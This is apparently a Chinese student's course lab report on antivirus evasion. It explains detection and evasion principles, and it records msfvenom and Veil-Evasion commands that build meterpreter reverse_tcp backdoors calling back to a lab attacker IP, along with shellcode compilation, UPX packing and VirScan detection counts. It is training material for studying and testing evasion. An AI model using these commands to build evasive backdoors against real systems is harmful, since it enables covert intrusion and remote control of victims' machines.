网络对抗技术 2017-2018-2 20152515 Exp3 免杀原理与实践

基础问题回答

（1）杀软是如何检测出恶意代码的？
答：分析恶意程序的行为特征，分析其代码流将其性质归类于恶意代码.
（2）免杀是做什么？
答：一般是对恶意软件做处理，让它不被杀毒软件所检测,也是渗透测试中需要使用到的技术。通常是要掩盖恶意代码的特征。
（3）免杀的基本方法有哪些?
答：
- 改变特征码
  - 如果你手里只有EXE
  - 加壳：压缩壳加密壳
- 有shellcode(像Meterpreter）
  - 用encode进行编码
  - 基于payload重新编译生成可执行文件
- 有源代码
  - 用其他语言进行重写再编译（veil-evasion）
- 改变行为
  - 通讯方式
    - 尽量使用反弹式连接
    - 使用隧道技术
    - 加密通讯数据
  - 操作模式
    - 基于内存操作
    - 减少对系统的修改
    - 加入混淆作用的正常功能代码

实验内容

实验环境

靶机：

系统：Windows7

杀软：金山毒霸 11.9.0

攻击机：

Kali 虚拟机

检测网站：

Viruscan

1.正确使用msf编码器，msfvenom生成如jar之类的其他文件，veil-evasion，自己利用shellcode编程等免杀工具或技巧；(1.5分)

使用msf编码器生成后门程序的Virscan检测结果
生成jar文件

用指令 msfvenom -p java/meterpreter/reverse_tcp lhost=192.168.1.109 lport=5213 x> 5213_backjar.jar生成

Virscan检测结果：
使用veil-evasion生成

首先你需要用 sudo apt-get install 安装veil-evasion。

然后veil 命令进入。参考的是这里面的教程最新的Veil3.0的安装和使用，这个教程是杜可欣同学找的，我觉得挺好用的。

进入之后生成payload命令如下所示：

# list

# 1

# use 1

# list

# use 7

接着是设置LHOST和LPORT

[] set LHOST 192.168.199.149

[] set LPORT 5215

[] generate

需要设置你想生成的文件名：

文件生成成功：

msf模块地址

/usr/share/veil-output/handlers/payload15.rc

Virscan检测结果如下：

我传到电脑上，我的win7金山毒霸也没有任何提醒和拦截，有点想换软件了_(:3 」∠)_ 。

用shellcode

先生成一个c语言格式的Shellcode数组

创建一个C文件：MSSC_5215.c（意为免杀shellcode），将上面生成的数组copy到该文件下，并写成C语言代码。

将C程序在codeblocks上编译得到.exe文件，在Virscan检测结果如下：

被7个软件查杀，比之前的9个好。

回连成功：

在win7电脑上显示未查杀到：

将程序在VS上编译得到.exe文件，在Virscan检测结果如下：

这个报毒最少，只有五个。

加壳

使用i686-w64-mingw32-g++ MSSC.c -o MSSC_5215.exe

命令将该C语言代码MSSC.c转换为一个可在64位windows系统下操作的可执行文件MSSC_5215.exe

然后使用upx #需要加壳的文件名 -o #加壳后的文件名对其进行加壳

在Virscan检测结果如下：

(本来我以为可以多加几个壳然后提高免杀率，像前面的一样进行多次编码，然后提示不行，加壳好像只能做一次）

2. 通过组合应用各种技术实现恶意代码免杀(1分)

（如果成功实现了免杀的，简单语言描述原理，不要截图。与杀软共生的结果验证要截图。）

我的win7+金山毒霸构成了一个毫无威胁性的防御体系，早在前面中的过程就已经实现了免杀，但是我还是用veil得到的.exe文件又加了一个壳检测了一下，也是显示扫描不到。

在Virscan检测结果如下：

显示是有8个报毒，其实效果一般，还不如那个用VS编译的。

3.用另一电脑实测，在杀软开启的情况下，可运行并回连成功，注明电脑的杀软名称与版本（1分）

实践总结与体会

这次的实验让我深刻地认识到金山毒霸不太好用，尤其是再配上win7这个老系统，感觉毫无任何安全系数可言，时刻暴露在危险之下。然后看了几个查杀的结果，我发现江民杀毒还挺不错，360还是可以的，所以我打算换个杀软。然后就是感觉这次的实验技术性更强，有一些原理上的内容，是需要理解和学习的。而且这门课的实践很适合让我回去在爸妈面前展示，嘻嘻。